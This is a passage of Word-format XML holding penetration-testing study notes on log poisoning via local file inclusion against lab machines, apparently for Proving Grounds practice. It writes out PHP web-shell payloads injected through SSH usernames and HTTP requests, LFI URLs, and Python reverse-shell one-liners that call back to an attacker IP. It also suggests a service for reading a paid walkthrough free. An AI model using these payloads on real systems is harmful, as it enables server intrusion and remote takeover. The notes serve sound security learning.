    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is SSH (port 22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then type this in NC sesson:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sinner/&lt;?php passthru($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"sinner" is the fake username being used for SSH, but it can be anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The code snippet </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php passthru($_GET['cmd']); ?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is written in PHP and is performing the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Receiving Input: It takes a parameter named cmd from the URL query string. For example, if the URL is http://example.com/script.php?cmd=ls, the value of cmd would be ls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing Command: The passthru() function in PHP executes the command passed to it as an argument. In this case, the command is the value of $_GET['cmd'].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outputting Result: The passthru() function sends the output of the executed command directly to the browser. This means that the result of the command will be displayed as part of the web page.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1905000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="575" name="image557.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image557.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58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CE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now going back to the vulnerable URL endpoint we can see the injection showing in the logs and test it by passing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.167.80/console/file.php?file=/var/log/auth.log&amp;cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1193800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="96" name="image96.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image96.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId581"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1193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CED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since I was able to verify my PHP injection worked I aimed to get a reverse shell using Python. I first made sure I set a netcat listener on my attacker machine and ran the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://192.168.167.80/console/file.php?file=/var/log/auth.log&amp;cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.204%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r1ona1s0h72m" w:id="242"/>
      <w:bookmarkEnd w:id="242"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting access.log</w:t>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId582">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Solstice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the paid walkthrough </w:t>
      </w:r>
      <w:hyperlink r:id="rId583">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but just use freedium to get it for free) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had LFI, and we tried doing Log Poisoning. We first looked at the access.log file, which is inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/access.log</w:t>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rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit, do below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -0.10.10.10 80 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nv 10.10.10.10 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This connects you to port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second command has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-nv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"No DNS resolution" and "verbose"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside of the netcat connection, copy and paste this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET &lt;?php system($_GET['cmd']);?&gt; HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now look at the access.log again, and if you don't see any PHP mentions at the end of the log file, then that means the PHP code probably got executed instead of being taken literally as a string and put into the logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can try and run some commands via this PHP injection. First we should see if Python is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.43.234:8593/index.php?book=../../../../../var/log/apache2/access.log&amp;cmd=which+python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "+" is URL encode for a space, so you can try a "+" or a space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now look at access.log and if you see a path to a python3 file in the end, then you have python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can use a python3 reverse shell one liner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.43.234:8593/index.php?book=../../../../../var/log/apache2/access.log&amp;cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",attackerport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the writeup, they used BurpSuite and URL encoded </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0E">
